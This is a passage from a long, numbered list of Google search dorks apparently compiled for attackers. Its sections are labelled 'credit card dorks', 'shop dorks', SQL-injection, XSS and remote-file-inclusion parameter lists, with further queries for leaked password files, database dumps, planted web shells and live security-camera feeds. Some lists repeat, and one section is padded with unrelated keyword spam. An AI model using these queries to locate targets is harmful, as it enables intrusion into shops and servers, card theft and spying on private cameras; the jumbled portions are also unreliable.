  6446. /modules/vwar/admin/admin.php?vwar_root= allinurl:vwar site:.com
  6447. /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= “powered by phpCOIN 1.2.3?
  6448. /tags.php?BBCodeFile= intitle:”Tagger LE” inurl:tags.php
  6449. index.php?pageurl= inurl:”index.php?pageurl=*.php”
  6450. /templates/headline_temp.php?nst_inc= allintitle:fusion:news:management:system
  6451. index.php?var= inurl:”index.php?var=*.php”
  6452. index.php?go= inurl:”index.php?go=”
  6453. index.php?site= inurl:”index.php?site=”
  6454. phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root= inurl:”phpwcms/index.php?id=”
  6455. administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:”.com.*/index.php?option=com_comprofiler”
  6456. index.php?pagina= inurl:”index.php?pagina=*.php”
  6457. index.php?id= inurl:”index.php?id=*.php”
  6458. index1.php?= inurl:”index1.php?=*.php?
  6459. index.php?site= inurl:”index.php?site=*.php”
  6460. main.php?id= inurl:”main.php?id=*.php”
  6461. content.php?page= inurl:”content.php?page=*.php”
  6462. admin.php?page= inurl:”admin.php?page=*.php”
  6463. lib/gore.php?libpath= inurl:”/SQuery/”
  6464. SQuery/lib/gore.php?libpath= inurl:”/SQuery/”
  6465. index2.php?p= inurl:”index2.php?p=*.php”
  6466. index1.php?go= inurl:”index1.php?go=*.php”
  6467. news_detail.php?file= inurl:”news_detail.php?file=*.php”
  6468. old_reports.php?file= inurl:”old_reports.php?file=*.php”
  6469. index.php?x= inurl:”index.php?x=*.php”
  6470. index.php?nic= inurl:”index.php?nic=*.php”
  6471. homepage.php?sel= inurl:”homepage.php?sel=*.php”
  6472. index.php?sel= inurl:”index.php?sel=*.php”
  6473. main.php?x= inurl:”main.php?x=*.php”
  6474. components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path= “inurl:com_artlinks”
  6475. index2.php?x= inurl:index2.php?x=*.php”
  6476. main.php?pagina= inurl:”main.php?pagina=*.php”
  6477. –credit card dorks–
  6478. cat.asp?cat=
  6479. productlist.asp?catalogid=
  6480. Category.asp?category_id=
  6481. Category.cfm?category_id=
  6482. category.asp?cid=
  6483. category.cfm?cid=
  6484. category.asp?cat=
  6485. category.cfm?cat=
  6486. category.asp?id=
  6487. index.cfm?pageid=
  6488. category.asp?catid=
  6489. Category.asp?c=
  6490. Category.cfm?c=
  6491. productlist.cfm?catalogid=
  6492. viewitem.asp?catalogid=
  6493. viewitem.cfm?catalogid=
  6494. catalog.cfm?catalogId=
  6495. catalog.asp?catalogId=
  6496. department.cfm?dept=
  6497. department.asp?dept=
  6498. itemdetails.cfm?catalogId=
  6499. product_detail.asp?catalogid=
  6500. product_detail.cfm?catalogid=
  6501. product_list.asp?catalogid=
  6502. product_list.cfm?catalogid=
  6503. ShowProduct.cfm?CatID=
  6504. ShowProduct.asp?CatID=
  6505. search_results.cfm?txtsearchParamCat=
  6506. search_results.asp?txtsearchParamCat=
  6507. itemdetails.asp?catalogId=
  6508. store-page.cfm?go=
  6509. store-page.asp?go=
  6510. Detail.cfm?CatalogID=
  6511. Detail.asp?CatalogID=
  6512. browse.cfm?category_id=
  6513. view.cfm?category_id=
  6514. products.cfm?category_id=
  6515. index.cfm?Category_ID=
  6516. detail.cfm?id=
  6517. category.cfm?id=
  6518. showitems.cfm?category_id=
  6519. ViewProduct.asp?PID=
  6520. ViewProduct.cfm?PID=
  6521. shopdisplayproducts.asp?catalogid=
  6522. shopdisplayproducts.cfn?catalogid=
  6523. displayproducts.cfm?category_id=
  6524. displayproducts.asp?category_id=
  6525. DisplayProducts.asp?prodcat=
  6526. DisplayProducts.cfm?prodcat=x
  6527. productDetail.cfm?ProductID=
  6528. products.php?subcat_id=
  6529. showitem.cfm?id=21
  6530. productdetail.cfm?pid=
  6531. default.cfm?action=46
  6532. products_accessories.asp?CatId=
  6533. Store_ViewProducts.asp?Cat=
  6534. category.cfm?categoryID=
  6535. category.asp?category=
  6536. tepeecart.cfm?shopid=
  6537. view_product.asp?productID=
  6538. ProductDetails.asp?prdId=12
  6539. products.cfm?ID=
  6540. detail.asp?product_id=
  6541. product_detail.asp?product_id=
  6542. product.php?product_id=
  6543. view_product.cfm?productID=
  6544. product_details.asp?prodid=
  6545. shopdisplayproducts.cfm?id=
  6546. displayproducts.cfm?id=
  6547. ——————
  6548. inurl:/shopmailpwd.asp
  6549. inurl:/shopdisplayproducts.asp
  6550. zaintech
  6551. ASP Web calendar
  6552. allinurl:shopdisplaycategories.asp
  6553. allinurl:vp-asp
  6554. vpasp templates
  6555. vpasp add ons
  6556. shopdisplaycategories
  6557. vpasp template
  6558. inurl:shopdisplaycategories.asp
  6559. allinurl: shopdisplaycategories.asp
  6560. vp-asp
  6561. VP-ASP Shopping Cart 5.00
  6562. shopmailpwd.asp
  6563. DUN creator
  6564. allinurl:shopmailpwd.asp
  6565. women only
  6566. allinurl:shopdisplayproducts.asp?id=
  6567. ASP Poll
  6568. GIFT LINK EXCHANGE
  6569. intitle:VP-ASP Shopping Cart 5.00
  6570. vp-asp template
  6571. vp-asp templates
  6572. asp poll system
  6573. Krashid
  6574. mobilesoftwares
  6575. allinurl: "shopaddtocart.asp?"
  6576. vp asp templates
  6577. allinurl:”shopdisplayproducts.asp?id=
  6578. inurl:shopcurrency.asp
  6579. allinurl:shopaddtocart.asp
  6580. simple banner rotator
  6581. vpasp addons
  6582. asp webcalendar
  6583. – VP-ASP
  6584. allinurl:”shopexd.asp?id="
  6585. allinurl:/vp-asp
  6586. inurl:shopdisplayproducts.asp
  6587. gift link exchange
  6588. vp-asp shopping cart
  6589. shopexd.asp
  6590. mobile softwares
  6591. template compatibile with vpasp
  6592. pin delivery system
  6593. shopdisplaycategories.asp
  6594. inurl:shopdisplayproducts.asp?= intext:password
  6595. poll systems
  6596. inurl:"shopdisplayproducts.asp?id=
  6597. flash news ticker
  6598. inurl:shopaddtocart.asp
  6599. asp web calendars
  6600. vp asp add ons
  6601. gifts + link exchange
  6602. asp web calendar
  6603. allinurl:”shopdisplayproducts.asp?id=8"
  6604. Zaintech SMS Bulk Sender
  6605. inurl:VP-ASP Shopping Cart
  6606. allinurl:"shopmailpwd.asp"
  6607. vpasp addon
  6608. Zaintech Technologies
  6609. allinurl:shopdisplayproducts.asp
  6610. allinurl:/shopdisplayproducts.asp?id=
  6611. dun maker
  6612. allinurl:shopexd.asp?id=
  6613. allinurl: shopmailpwd.asp
  6614. inurl:shopdisplayproducts.asp?id=
  6615. gift certificate ASP/Internet application
  6616. order form creator
  6617. powered by VP-ASP Shopping Cart
  6618. vp asp shopexd.asp
  6619. sms bulk
  6620. vpasp patch
  6621. /admin/orders.asp
  6622. allinurl: "shopaddtocart.asp?
  6623. asp web poll
  6624. write a asp hosting review
  6625. softwares
  6626. banner rotator
  6627. shopping link exchange
  6628. review polling system
  6629. shopmailpwd
  6630. vp-asp 5.00
  6631. vp-asp 6.00
  6632. real time shipping calculator fedex
  6633. VP-ASP
  6634. vpasp vat
  6635. inurl:shopmailpwd.asp
  6636. intitle:VP-ASP Shopping Cart filetype:asp
  6637. flash currency ticker
  6638. real time shipping modules
  6639. link-exchange-category.asp
  6640. VP-ASP website
  6641. ip to country database
  6642. shopdisplaycategories.asp sale
  6643. inurl:shopdisplayproducts.asp password
  6644. vp asp addons
  6645. american add to cart .asp id =
  6646. aspweb calendar
  6647. VP Advance plus
  6648. fedex real time
  6649. shopaddtocart.asp
  6650. vp-asp eShop Login
  6651. store/ shop/ products .asp?id= € £
  6652. vp-asp add-ons
  6653. asp banner rotator
  6654. "link exchange" + Gifts
  6655. vpasp special discount
  6656. avg network edition review
  6657. inurl:shopdisplaycategories.asp+vp
  6658. addon vpasp
  6659. vpasp .rar
  6660. intext:"vp-asp shopping" inurl:".asp?id="
  6661. dollar shopping cart add ons
  6662. inurl:shopdisplayproducts.asp?= tools
  6663. shopaddtocart.asp (Search.com)
  6664. vpasp review
  6665. VP-ASP Shopping Cart
  6666. '''inurl:"shopmailpwd.asp"
  6667. shopdisplaycategories shopping
  6668. asp Web Calendar Review
  6669. women calendar
  6670. vpasp plus
  6671. inurl:vp-asp
  6672. VP-ASP Shopping reseller discount price
  6673. vp-asp add ons
  6674. winrar bulk
  6675. shopcustadmin.asp
  6676. inurl:/eshop/shopdisplayproducts.asp?id=
  6677. vpasp
  6678. Zaintech Technologies poll
  6679. vpasp royal mail
  6680. Flash sms ticker
  6681. inurl:/shopdisplaycategories.asp
  6682. vpasp add on
  6683. Finance "link exchange"
  6684. conception calendars
  6685. anti-spyware v5.xx
  6686. shopdisplayproducts.asp?cat=
  6687. VP-ASP Shopping Cart 6.00
  6688. vp-asp inurl:"shopdisplaycategories.asp"
  6689. VP-ASP 5
  6690. VP-ASP Shopping Cart asp
  6691. vp-asp packing slip
  6692. allinurl:shopexd.asp?
  6693. "welcome to our visitor from" +script
  6694. asp link exchange
  6695. inurl:/shopdisplaycategories.asp?id=
  6696. /shopmailpwd.asp
  6697. "Order Form Creator"
  6698. allinurl:"shopdisplayproducts.asp?id="
  6699. SMS Create Pro v5.5
  6700. allinurl:shopexd.asp?id=9
  6701. vpasp sql
  6702. "website watcher" addons
  6703. inurl:shopdisplayproducts.asp?id intext:password
  6704. vpasp security
  6705. vpasp check out with gift certificate
  6706. "web-based calendar" "cost calculator"
  6707. shop login.asp
  6708. vp asp google checkout
  6709. poll system service
  6710. intitle: VP-ASP Shopping Cart 5.00
  6711. asp database web form creator
  6712. VP-ASP 0
  6713. shopaddtocart.asp?
  6714. mobiles softwares
  6715. Product Showcase vp-asp
  6716. inurl:shopaddtocart.asp?id=
  6717. "asp poll"
  6718. asp calendar checkout system
  6719. SelectSurveyASP Reviews
  6720. vp asp reviews
  6721. 0-75
  6722. /store/shopmailpwd.asp
  6723. VP-ASP SHOPPING
  6724. inurl:"shopexd.asp?id="
  6725. poll system guide asp
  6726. inurl:shopcurrency.asp site:com
  6727. inurl:shopmailpwd.asp site:com
  6728. vpasp flash templates
  6729. VP-ASP Template Fields
  6730. anti virus softwares for mobile
  6731. http://www.krashid.com
  6732. allinurl: eshop/shopexd.asp?id=
  6733. websites powered by vpasp
  6734. technology + e-marketing
  6735. free mobile counters
  6736. asp where fileds
  6737. free softwares for making tickers
  6738. asp applications
  6739. asp calendar link to exchange calendar
  6740. "asp Web Calendar
  6741. poll system -sql
  6742. sms softwares for banks from korea
  6743. Zaintech
  6744. VP-ASP patch
  6745. account and finance
  6746. shipping cost calculating
  6747. asp calendars for web
  6748. intitle:VP-ASP Shopping Cart
  6749. new softwares&technologies
  6750. inurl:VP-ASP Shopping
  6751. asp count link clicks
  6752. poll system asp
  6753. allinurl:.shopmailpwd.asp
  6754. calendar vpasp
  6755. vpasp tax
  6756. template vpasp
  6757. "ASP SUPPORT SERVICES"
  6758. poll system
  6759. survey system
  6760. Master Link Cloaker
  6761. – VP-ASP.
  6762. pregnancy conception clinic
  6763. vpasp additional shipping fields
  6764. "vp-asp" template
  6765. shop/admin.asp
  6766. winrar
  6767. asp ip country database
  6768. Zaintech's Order Form Creator
  6769. customer services asp template
  6770. auto polling system
  6771. VP-ASP Shopping Cart 5
  6772. allinurl:"shopexd.asp?id="
  6773. VP-IP
  6774. "asp links"
  6775. asp and e-business
  6776. ASP Invoice
  6777. new softwares for clinic
  6778. write a hosting review
  6779. shipping cost calculator
  6780. allinurl: shopdisplaycategories
  6781. "teleport pro" "code shown"
  6782. vp asp
  6783. create ASP google sitemap
  6784. simple asp product showcase
  6785. asp also bought how to
  6786. asp poll systems
  6787. http://www.-womenonly.com
  6788. flash news tickers
  6789. asp link exchange address book
  6790. asp link
  6791. bulk shipping calculation
  6792. VP-ASP Shopping Carts (
  6793. ———————
  6794.  
  6795. Warning: mysql_result():
  6796. inurl:(0x3a,version
  6797. inurl:(@version,0x3a,databse)
  6798. inurl:(user,0x3a,pass)
  6799. inurl:+union+select+ from
  6800. inurl:+union+select+ pass
  6801. inurl:+union+select+ SHOP
  6802. inurl:+union+select+ admin
  6803. inurl:index.php?id=
  6804. inurl:pageid=
  6805. inurl:page.php?file=
  6806. inurl:newsDetail.php?id=
  6807. inurl:article.php?id=
  6808. inurl:staff_id=
  6809. inurl:readnews.php?id=
  6810. inurl:historialeer.php?num=
  6811. inurl:Stray-Questions-View.php?num=
  6812. inurl:game.php?id=
  6813. inurl:news.php?id=
  6814. inurl:ogl_inet.php?ogl_id=
  6815. inurl:kategorie.php4?id=
  6816. inurl:faq2.php?id=
  6817. inurl:opinions.php?id=
  6818. inurl:download.php?id=
  6819. inurl:review.php?id=
  6820. inurl:read.php?id=
  6821. inurl:prod_detail.php?id=
  6822. inurl:person.php?id=
  6823. inurl:showimg.php?id=
  6824. inurl:view.php?id=
  6825. inurl:index.php?=
  6826. inurl:profile_view.php?id=
  6827. inurl:downloads_info.php?id=
  6828. inurl:shop.php?do=part&id=
  6829. inurl:band_info.php?id=
  6830. inurl:product.php?id=
  6831. inurl:ray.php?id=
  6832. inurl:pop.php?id=
  6833. inurl:viewshowdetail.php?id=
  6834. inurl:memberInfo.php?id=
  6835. inurl:shop_category.php?id=
  6836. inurl:index2.php?option=
  6837. inurl:newsone.php?id=
  6838. inurl:sql.php?id=
  6839. inurl:clanek.php4?id=
  6840. inurl:viewapp.php?id=
  6841. inurl:iniziativa.php?in=
  6842. inurl:newscat.php?id=
  6843. inurl:rubrika.php?idr=
  6844. inurl:title.php?id=
  6845. inurl:recruit_details.php?id=
  6846. inurl:index.php?cPath=
  6847. inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
  6848. inurl:"id=" & intext:"Warning: mysql_fetch_array()
  6849. inurl:"id=" & intext:"Warning: mysql_num_rows()
  6850. inurl:"id=" & intext:"Warning: getimagesize()
  6851. inurl:"id=" & intext:"Warning: is_writable()
  6852. inurl:"id=" & intext:"Warning: Unknown()
  6853. inurl:"id=" & intext:"Warning: session_start()
  6854. inurl:"id=" & intext:"Warning: pg_exec()
  6855. inurl:"id=" & intext:"Warning: mysql_result()
  6856. inurl:"id=" & intext:"Warning: mysql_query()
  6857. inurl:"id=" & intext:"Warning: array_merge()
  6858. inurl:"id=" & intext:"Warning: preg_match()
  6859. inurl:"id=" & intext:"Warning: ilesize()
  6860. inurl:"id=" & intext:"Warning: filesize()
  6861. inurl:"id=" & intext:"Warning: require()
  6862. –xss–
  6863. inurl:".php?cmd="
  6864. inurl:".php?z="
  6865. inurl:".php?q="
  6866. inurl:".php?search="
  6867. inurl:".php?query="
  6868. inurl:".php?searchstring="
  6869. inurl:".php?keyword="
  6870. inurl:".php?file="
  6871. inurl:".php?years="
  6872. inurl:".php?txt="
  6873. inurl:".php?tag="
  6874. inurl:".php?max="
  6875. inurl:".php?from="
  6876. inurl:".php?author="
  6877. inurl:".php?pass="
  6878. inurl:".php?feedback="
  6879. inurl:".php?mail="
  6880. inurl:".php?cat="
  6881. inurl:".php?vote="
  6882. –cc–
  6883. cat.asp?cat=
  6884. Category.asp?category_id=
  6885. Category.cfm?category_id=
  6886. category.asp?cid=
  6887. category.cfm?cid=
  6888. category.asp?cat=
  6889. category.cfm?cat=
  6890. category.asp?id=
  6891. index.cfm?pageid=
  6892. category.asp?catid=
  6893. Category.asp?c=
  6894. Category.cfm?c=
  6895. productlist.cfm?catalogid=
  6896. productlist.asp?catalogid=
  6897. viewitem.asp?catalogid=
  6898. viewitem.cfm?catalogid=
  6899. catalog.cfm?catalogId=
  6900. catalog.asp?catalogId=
  6901. department.cfm?dept=
  6902. department.asp?dept=
  6903. itemdetails.cfm?catalogId=
  6904. product_detail.asp?catalogid=
  6905. product_detail.cfm?catalogid=
  6906. product_list.asp?catalogid=
  6907. product_list.cfm?catalogid=
  6908. ShowProduct.cfm?CatID=
  6909. ShowProduct.asp?CatID=
  6910. search_results.cfm?txtsearchParamCat=
  6911. search_results.asp?txtsearchParamCat=
  6912. itemdetails.asp?catalogId=
  6913. store-page.cfm?go=
  6914. store-page.asp?go=
  6915. Detail.cfm?CatalogID=
  6916. Detail.asp?CatalogID=
  6917. browse.cfm?category_id=
  6918. view.cfm?category_id=
  6919. products.cfm?category_id=
  6920. index.cfm?Category_ID=
  6921. detail.cfm?id=
  6922. category.cfm?id=
  6923. showitems.cfm?category_id=
  6924. ViewProduct.asp?PID=
  6925. ViewProduct.cfm?PID=
  6926. shopdisplayproducts.asp?catalogid=
  6927. shopdisplayproducts.cfn?catalogid=
  6928. displayproducts.cfm?category_id=
  6929. displayproducts.asp?category_id=
  6930. DisplayProducts.asp?prodcat=
  6931. DisplayProducts.cfm?prodcat=x
  6932. productDetail.cfm?ProductID=
  6933. products.php?subcat_id=
  6934. showitem.cfm?id=21
  6935. productdetail.cfm?pid=
  6936. default.cfm?action=46
  6937. products_accessories.asp?CatId=
  6938. Store_ViewProducts.asp?Cat=
  6939. category.cfm?categoryID=
  6940. category.asp?category=
  6941. tepeecart.cfm?shopid=
  6942. view_product.asp?productID=
  6943. ProductDetails.asp?prdId=12
  6944. products.cfm?ID=
  6945. detail.asp?product_id=
  6946. product_detail.asp?product_id=
  6947. product.php?product_id=
  6948. view_product.cfm?productID=
  6949. product_details.asp?prodid=
  6950. shopdisplayproducts.cfm?id=
  6951. –shop dorks–
  6952.  
  6953. ".asp?bookID="
  6954. ".asp?cart="
  6955. ".asp?cartID="
  6956. ".asp?catalogid="
  6957. ".asp?CategoryID="
  6958. ".asp?catID="
  6959. ".asp?code="
  6960. ".asp?framecode="
  6961. ".asp?id="
  6962. ".asp?idcategory="
  6963. ".asp?idproduct="
  6964. ".asp?intCatalogID="
  6965. ".asp?item_id="
  6966. ".asp?maingroup="
  6967. ".asp?misc="
  6968. ".asp?newsid="
  6969. ".asp?order_id="
  6970. ".asp?p="
  6971. ".asp?ProdID="
  6972. ".asp?product="
  6973. ".asp?productid="
  6974. ".asp?showtopic="
  6975. ".asp?Sku="
  6976. ".asp?storeid="
  6977. ".asp?style_id="
  6978. ".asp?StyleID="
  6979. ".asp?userID="
  6980. "add.asp?bookid="
  6981. "addItem.asp"
  6982. "addtomylist.asp?ProdId="
  6983. "adminEditProductFields.asp?intProdID="
  6984. "affiliate-agreement.cfm?storeid="
  6985. "affiliates.asp?id="
  6986. "archive.asp?id="
  6987. "article.asp?id="
  6988. "basket.asp?id="
  6989. "book_list.asp?bookid="
  6990. "book_view.asp?bookid="
  6991. "BookDetails.asp?ID="
  6992. "buy.asp?"
  6993. "cart.asp?action="
  6994. "cart.asp?cart_id="
  6995. "cart.asp?id="
  6996. "cart_validate.asp?id="
  6997. "cartadd.asp?id="
  6998. "cat.asp?iCat="
  6999. "catalog.asp"
  7000. "catalog.asp?CatalogID="
  7001. "catalog_item.asp?ID="
  7002. "category.asp?catid="
  7003. "categorydisplay.asp?catid="
  7004. "customerService.asp?TextID1="
  7005. "default.asp?catID="
  7006. "details.asp?Product_ID="
  7007. "displayproducts.asp"
  7008. "emailproduct.asp?itemid="
  7009. "events.asp?ID="
  7010. "getbook.asp?bookid="
  7011. "help.asp?CartId="
  7012. "index.asp?cart="
  7013. "info.asp?ID="
  7014. "item.asp?item_id="
  7015. "item.asp?itemid="
  7016. "item.asp?shopcd="
  7017. "item_list.asp?maingroup"
  7018. "item_show.asp?code_no="
  7019. "itemDesc.asp?CartId="
  7020. "itemdetail.asp?item="
  7021. "links.asp?catid="
  7022. "List.asp?CatID="
  7023. "listcategoriesandproducts.asp?idCategory="
  7024. "modline.asp?id="
  7025. "myaccount.asp?catid="
  7026. "news.asp?id="
  7027. "OrderForm.asp?Cart="
  7028. "page.asp?PartID="
  7029. "powersearch.asp?CartId="
  7030. "price.asp"
  7031. "privacy.asp?cartID="
  7032. "prodbycat.asp?intCatalogID="
  7033. "product.asp?bookID="
  7034. "product.asp?intProdID="
  7035. "product_info.asp?item_id="
  7036. "productDisplay.asp"
  7037. "productlist.asp?ViewType=Category&CategoryID="
  7038. "productpage.asp"
  7039. "productsByCategory.asp?intCatalogID="
  7040. "prodView.asp?idProduct="
  7041. "promo.asp?id="
  7042. "promotion.asp?catid="
  7043. "pview.asp?Item="
  7044. "resellers.asp?idCategory="
  7045. "searchcat.asp?search_id="
  7046. "Select_Item.asp?id="
  7047. "Services.asp?ID="
  7048. "shippinginfo.asp?CartId="
  7049. "shop.asp?a="
  7050. "shop.asp?action="
  7051. "shop.asp?cartID="
  7052. "shop_details.asp?prodid="
  7053. "shopbasket.asp?bookid="
  7054. "shopcart.asp?title="
  7055. "shopcreatorder.asp"
  7056. "shopdc.asp?bookid="
  7057. "shopdisplayproduct.asp?catalogid="
  7058. "shopexd.asp?catalogid="
  7059. "shopreviewlist.asp?id="
  7060. "shoptellafriend.asp?id="
  7061. "show_item.asp?id="
  7062. "show_item_details.asp?item_id="
  7063. "showbook.asp?bookid="
  7064. "shprodde.asp?SKU="
  7065. "specials.asp?id="
  7066. "store_bycat.asp?id="
  7067. "Store_ViewProducts.asp?Cat="
  7068. "store-details.asp?id="
  7069. "storeitem.asp?item="
  7070. "subcategories.asp?id="
  7071. "template.asp?Action=Item&pid="
  7072. "topic.asp?ID="
  7073. "updates.asp?ID="
  7074. "view.asp?cid="
  7075. "viewcart.asp?CartId="
  7076. "viewCart.asp?userID="
  7077. "viewCat_h.asp?idCategory="
  7078. "viewevent.asp?EventID="
  7079. "viewPrd.asp?idcategory="
  7080. "voteList.asp?item_ID="
  7081. "whatsnew.asp?idCategory="
  7082. "WsAncillary.asp?ID="
  7083. "WsPages.asp?ID="
  7084. allinurl:”shopdisplayproducts.asp?id=
  7085. allinurl:”shopdisplayproducts.asp?id=1
  7086. allinurl:”shopdisplayproducts.asp?id=2
  7087. allinurl:”.com/shopdisplayproducts.asp?id=
  7088. allinurl:”.net/shopdisplayproducts.asp?id=
  7089. .asp?=catalogid=
  7090. .asp?cid=
  7091. alliurl: shop$.asp?$=
  7092. shopexd.asp?
  7093. shopreviewlist.asp?id=1
  7094. ——–
  7095. allinurl:auth_user_file.txt.cz
  7096. allinurl:auth_user_file.txt.net
  7097. allinurl:auth_user_file.txt.com
  7098. allinurl:auth_user_file.txt.info
  7099. allinurl:auth_user_file.txt.org
  7100. allinurl:auth_user_file.txt.sk
  7101. allinurl:auth_user_file.txt.biz
  7102. allinurl:auth_user_file.txt.name
  7103. –random data–
  7104. proxy dorks
  7105. intitle:”Start using CGIProxy”
  7106. intitle:”PHProxy”
  7107. inurl:”/cgi-bin/nph-proxy.cgi”
  7108. inurl:”/phproxy/”
  7109. inurl:”/cgi-bin/*proxy.cgi”
  7110. intitle:”proxy” OR “pr0xy” OR “pr0xies” OR “proxies” OR “free proxy” OR “unblock proxy” OR “proxy*”
  7111. inurl:.blogspot site:.com
  7112. allinurl:*.blogspot.com
  7113. filetype:ctt “msn” (for emails)
  7114. inurl:edu inurl:”emails.txt”
  7115. shell finding
  7116. intext:”w4ck1ng-shell” intitle:”shell@” (change name to other shell,too)
  7117. –database dumps–
  7118. intext:”MySQL-Dump” “Host: localhost” filetype:sql
  7119. intext:”PostgreSQL database dump” filetype:sql
  7120. intext:”phpBB Backup Script” filetype:sql
  7121. intext:”phpMyAdmin MySQL-Dump” filetype:sql
  7122. –web security cameras–
  7123. intitle:axis intitle:”video server”
  7124. inurl:axis-cgi/mjpg
  7125. inurl:view/indexFrame.shtml
  7126. intitle:”Live NetSnap Cam-Server feed”
  7127. allintitle:”Network Camera NetworkCamera”
  7128. inurl:view/view.shtml
  7129. liveapplet
  7130. inurl:ViewerFrame?Mode=
  7131. inurl:ViewerFrame?Mode=Refresh
  7132. intitle:liveapplet
  7133. inurl:axis-cgi/jpg
  7134. intitle:”live view” intitle:axis
  7135. intitle:liveapplet inurl:LvAppl
  7136. intitle:”EvoCam” inurl:”webcam.html”
  7137. inurl:view/index.shtml
  7138. intitle:”Live View / – AXIS”
  7139. intitle:”Live View / – AXIS 206M”
  7140. intitle:”Live View / – AXIS 206W”
  7141. intitle:”Live View / – AXIS 210?
  7142. inurl:indexFrame.shtml Axis
  7143. inurl:”MultiCameraFrame?Mode=Motion”
  7144. intitle:start inurl:cgistart
  7145. intext:”MOBOTIX M1? intext:”Open Menu”
  7146. intext:”MOBOTIX M10? intext:”Open Menu”
  7147. intext:”MOBOTIX D10? intext:”Open Menu”
  7148. intitle:snc-z20 inurl:home/
  7149. intitle:snc-cs3 inurl:home/
  7150. intitle:snc-rz30 inurl:home/
  7151. intitle:”sony network camera snc-p1?
  7152. intitle:”sony network camera snc-m1?
  7153. site:.viewnetcam.com -www.viewnetcam.com
  7154. intitle:”Toshiba Network Camera” user login
  7155. intitle:”netcam live image”
  7156. intitle:”i-Catcher Console – Web Monitor”
  7157. –rfi–
  7158. index.php?body=
  7159. /sources/template.php?CONFIG[main_path]=
  7160. /includes/dbal.php?eqdkp_root_path=
  7161. /sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=
  7162. /includes/kb_constants.php?module_root_path=
  7163. /zipndownload.php?PP_PATH=
  7164. /main.php?sayfa=
  7165. /addpost_newpoll.php?addpoll=preview&thispath=
  7166. impex/ImpExData.php?systempath=
  7167. /modules/vwar/admin/admin.php?vwar_root=
  7168. /tools/send_reminders.php?includedir= allinurl:day.php?date=
  7169. index.php?pagina=
  7170. admin.php?page=
  7171. lib/gore.php?libpath=
  7172. old_reports.php?file=
  7173. main.php?x=
  7174. akocomments.php?mosConfig_absolute_path=
  7175. index.php?lang=
  7176. index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=
  7177. index.php?mode=
  7178. index.php?sub=
  7179. index.php?t=
  7180. index.php?r=
  7181. index0.php?show=
  7182. administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=
  7183. content.php?page=
  7184. index.php?topic=
  7185. administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=
  7186. administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=
  7187. /tags.php?BBCodeFile=
  7188. administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=
  7189. administrator/components/com_webring/admin.webring.docs.php?component_dir=
  7190. administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=
  7191. help.php?css_path=
  7192. components/com_galleria/galleria.html.php?mosConfig_absolute_path=
  7193. includes/search.php?GlobalSettings[templatesDirectory]=
  7194. modules/My_eGallery/index.php?basepath=
  7195. index2.php?to=
  7196. home.php?pagina=
  7197. /modules/My_eGallery/public/displayCategory.php?basepath=
  7198. db.php?path_local=
  7199. index.php?go=
  7200. index.php?content=
  7201. index.php?doc=
  7202. index.php?l=
  7203. index.php?a=
  7204. index.php?principal=
  7205. index.php?conteudo=
  7206. index.php?dsp=
  7207. index.php?pilih=
  7208. template.php?pagina=
  7209. forum.php?act=
  7210. index.php?cont=
  7211. index.php?action=
  7212. index.php?do=
  7213. index.phpmain.php?x=
  7214. htmltonuke.php?filnavn=
  7215. ihm.php?p=
  7216. index.php?Language=
  7217. hall.php?file=
  7218. hall.php?page=
  7219. video.php?content=
  7220. index1.php?choix=
  7221. index.php?ort=
  7222. index2.php?DoAction=
  7223. home.php?content=
  7224. home.php?x=
  7225. index2.php?x=
  7226. /include/main.php?config[search_disp]=true&include_dir=
  7227. /contrib/yabbse/poc.php?poc_root_path=
  7228. /phpopenchat/contrib/yabbse/poc.php?sourcedir=
  7229. /squito/photolist.inc.php?photoroot=
  7230. /ppa/inc/functions.inc.php?config[ppa_root_path]=
  7231. /spid/lang/lang.php?lang_path=
  7232. al_initialize.php?alpath=
  7233. /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
  7234. /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=
  7235. administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=
  7236. /admin_modules/admin_module_deldir.inc.php?config[path_src_include]=
  7237. /popup_window.php?site_isp_root=
  7238. /surveys/survey.inc.php?path=
  7239. /classes/adodbt/sql.php?classes_dir=
  7240. enc/content.php?Home_Path=
  7241. /embed/day.php?path=
  7242. sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=
  7243. /mcf.php?content=
  7244. skins/advanced/advanced1.php?pluginpath[0]=
  7245. /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=
  7246. administrator/components/com_remository/admin.remosi
  7247. /modules/coppermine/themes/default/theme.php?THEME_DIR=
  7248. /tools/send_reminders.php?includedir=
  7249. login.php?dir=
  7250. index.php?pageurl=
  7251. /templates/headline_temp.php?nst_inc=
  7252. index.php?site=
  7253. news_detail.php?file=
  7254. config.php?_CCFG[_PKG_PATH_DBSE]=
  7255. components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=
  7256. test.php?page=
  7257. index.php?incl=
  7258. avatar.php?page=
  7259. index.php?p=
  7260. index.php?x= index.php?mode=index.php?stranica=
  7261. index.php?sub=index.php?id=index.php?t=
  7262. index.php?menu=
  7263. index.php?pag=
  7264. administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= /tags.php?BBCodeFile=
  7265. index.php?u=administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=
  7266. /modules/vwar/admin/admin.php?vwar_root=index.php?loc=
  7267. allinurl:.br/index.php?loc=
  7268. administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=
  7269. /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=
  7270. myevent.php?myevent_path=
  7271. show.php?path=
  7272. search.php?cutepath=
  7273. show_news.php?cutepath=
  7274. big.php?pathtotemplate=
  7275. /functions.php?include_path=
